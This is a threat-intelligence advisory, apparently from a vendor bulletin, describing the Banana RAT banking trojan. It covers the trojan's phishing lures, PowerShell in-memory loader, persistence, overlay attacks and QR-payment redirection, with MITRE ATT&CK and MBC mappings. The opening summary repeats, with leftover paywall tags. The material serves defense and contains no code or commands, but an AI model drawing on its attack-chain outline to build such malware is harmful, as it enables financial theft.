EXECUTIVE SUMMARY:
A newly identified banking-focused remote access trojan, Banana RAT, has been observed in active campaigns attributed to the threat activity cluster SHADOW-WATER-063, targeting financial users through deceptive social engineering techniques. The malware is designed to impersonate legitimate documents and system notifications in order to trick victims into executing malicious files. Once deployed, it enables attackers to gain full control over infected systems, allowing them to monitor user activity and manipulate financial transactions in real time. The operation is primarily financially motivated and is structured to maximize stealth and fraud efficiency.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY:
A newly identified banking-focused remote access trojan, Banana RAT, has been observed in active campaigns attributed to the threat activity cluster SHADOW-WATER-063, targeting financial users through deceptive social engineering techniques. The malware is designed to impersonate legitimate documents and system notifications in order to trick victims into executing malicious files. Once deployed, it enables attackers to gain full control over infected systems, allowing them to monitor user activity and manipulate financial transactions in real time. The operation is primarily financially motivated and is structured to maximize stealth and fraud efficiency.[emaillocker id="1283"]
The malware operates through a multi-stage infection chain initiated by a disguised batch file delivered via phishing messages or fake document lures. Upon execution, a PowerShell-based loader retrieves an encrypted payload from a remote server and executes it entirely in memory, minimizing forensic traces on disk. The payload is heavily obfuscated using multiple encryption and packing layers, enabling it to evade signature-based detection. It establishes persistence through scheduled tasks and communicates with command-and-control infrastructure over encrypted channels. Once active, the trojan provides full remote access capabilities including live screen streaming, keyboard and mouse control, keylogging, clipboard manipulation, and browser session monitoring. It is also capable of detecting active banking sessions and deploying full-screen overlay attacks to impersonate financial institutions, while intercepting payment mechanisms such as QR-based transactions to redirect funds to attacker-controlled accounts.
Banana RAT represents a highly adaptive banking trojan that combines fileless execution, polymorphism, and remote access capabilities to conduct financial theft at scale. Its ability to maintain stealth while enabling full system compromise makes it a significant threat to banking users, particularly in environments where phishing resistance and endpoint monitoring are limited. Organizations and users are advised to strengthen phishing awareness, enforce endpoint detection mechanisms, and monitor for anomalous banking activity to mitigate such threats.
THREAT PROFILE:
| Tactic | Technique Id | Technique | Sub-technique |
| Initial Access | T1566.002 | Phishing | Spearphishing Link |
| T1566.001 | Spearphishing Attachment | ||
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| T1204.002 | User Execution | Malicious File | |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Stealth | T1027.002 | Obfuscated Files or Information | Software Packing |
| T1055.002 | Process Injection | Portable Executable Injection | |
| Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| T1539 | Steal Web Session Cookie | - | |
| Collection | T1113 | Screen Capture | - |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| T1105 | Ingress Tool Transfer | - | |
| Impact | T1565.002 | Data Manipulation | Transmitted Data Manipulation |
| T1496.001 | Resource Hijacking | Compute Hijacking |
MBC MAPPING:
| Objective | Behaviour ID | Behaviour |
| Anti-Behavioral Analysis | B0001 | Debugger Detection |
| B0003 | Dynamic Analysis Evasion | |
| Anti-Static Analysis | B0032 | Executable Code Obfuscation |
| Collection | E1113 | Screen Capture |
| F0002 | Keylogging | |
| E1056 | Input Capture | |
| Command and Control | B0030 | C2 Communication |
| Defense Evasion | B0025 | Conditional Execution |
| B0027 | Alternative Installation Location | |
| B0040 | Covert Location | |
| E1027 | Obfuscated Files or Information | |
| F0001 | Software Packing | |
| E1055 | Process Injection | |
| Discovery | E1082 | System Information Discovery |
| E1083 | File and Directory Discovery | |
| E1010 | Application Window Discovery | |
| Execution | B0011 | Remote Commands |
| E1059 | Command and Scripting Interpreter | |
| Impact | E1486 | Data Encrypted for Impact |
| B0022 | Remote Access | |
| Persistence | F0012 | Registry Run Keys / Startup Folder |
| B0035 | Shutdown Event | |
| F0011 | Modify Existing Service |
REFERENCES:
The following reports contain further technical details:
https://cybersecuritynews.com/hackers-use-nf-e-invoice-lures/
https://www.trendmicro.com/en_us/research/26/e/banana-rat.html